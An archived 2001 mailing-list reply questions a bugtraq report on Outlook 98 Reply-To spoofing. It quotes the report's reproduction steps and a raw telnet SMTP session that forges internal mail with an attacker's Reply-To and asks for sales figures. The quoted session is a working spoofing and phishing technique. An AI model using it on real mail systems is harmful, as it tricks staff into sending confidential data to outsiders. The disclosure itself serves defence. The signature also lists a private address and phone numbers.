Hi Nate, I was not able to reproduce the exploit that you reported to the bugtraq mailing list. Outlook98 did exactly what I expected: when I open the mail, I see the "From:"-header in the message. When I reply to the email, Outlook takes the "Reply-To:"-address of the header. Which version of Outlook did you test? Best Regards, Sebastian PS: your "quick script" has a little bug: the header entry should be "Reply-To:" instead of "Reply To:". Nate Lawson <nateat_private> wrote: > Problem: Outlook uses a sender's Reply-To address silently, allowing > a user to inadvertently send data to an Internet mail account > when intending to reply to an internal, trusted user. > > Impact: Anyone on the Internet can spoof a trusted internal Exchange user > and get replies sent back to themself without the user knowing they > weren't responding to another internal user. > > How to reproduce: > > 1. Spoof mail as an internal user with a Reply-To address claiming to be > an internal user, but an address of an Internet account, say hotmail. > 2. Go into Outlook and read the mail. The mail looks like it was internally > generated but viewing the full Internet headers under View->Options > shows the bogus Reply-To header. > 3. Hit Reply in Outlook. The To: field looks like it's going to a valid > internal user, but right clicking on it and choosing Properties shows > that the internal user it is sending the reply to is actually an Internet > address. > 4. Enter some text and hit Send. Observe that the mail went to the attacker's > account, not the internal one. > > A quick script: > > {root 5:00pm} ~> telnet mail.example.com 25 > Trying 10.20.2.5... > Connected to mail.example.com. > Escape character is '^]'. > 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready > helo losebag > 250 OK > mail from:<> > 250 OK - mail from <> > rcpt to:<accountingat_private> > 250 OK - Recipient <accountingat_private> > data > 354 Send data. End with CRLF.CRLF > From: Nate Lawson > To: Accounting > Reply To: Nate Lawson<intruderat_private> > Subject: important! > > Please reply with the latest copy of our sales figures! > > Thanks, > Nate > . > 250 OK > quit > 221 closing connection > Connection closed by foreign host. > > Now, a reply to the email will go not to the trusted internal user Nate > Lawson <nlawsonat_private> but to the attacker, <intruderat_private>. > Worse, the user sees no indication that the mail is outward-bound! The > To: field on the reply simply shows "Nate Lawson", a valid internal user. > > Affected programs: Only tested on Outlook 98 > > Known use of this bug to get confidential information: none yet > > Suggested Fix: always show the full email address of any recipient that is > not local (i.e. usernameat_private would be hidden but any instance of > userat_private would be shown) > > Microsoft has been notified, but claimed this was a weakness in SMTP and > would not be fixed until a secure successor to SMTP is implemented. They > obviouly missed the point -- the error is not in that mail can be forged, > but that Outlook allows a user to respond to a message that looks local > and legitimate, but is actually destined for an outside address. > > -Nate -- -- What's a letter? Is it like E-mail? ((o)(o)) |---------------------------------------------------ooOo-( )-oOoo-| | Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen ( ) | | Germany, Voice: ++49 (0)7071 49570 ( ) | | GSM: 0049-173-3502725 (..) | |------------------------------------------------------------------| Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:40 PDT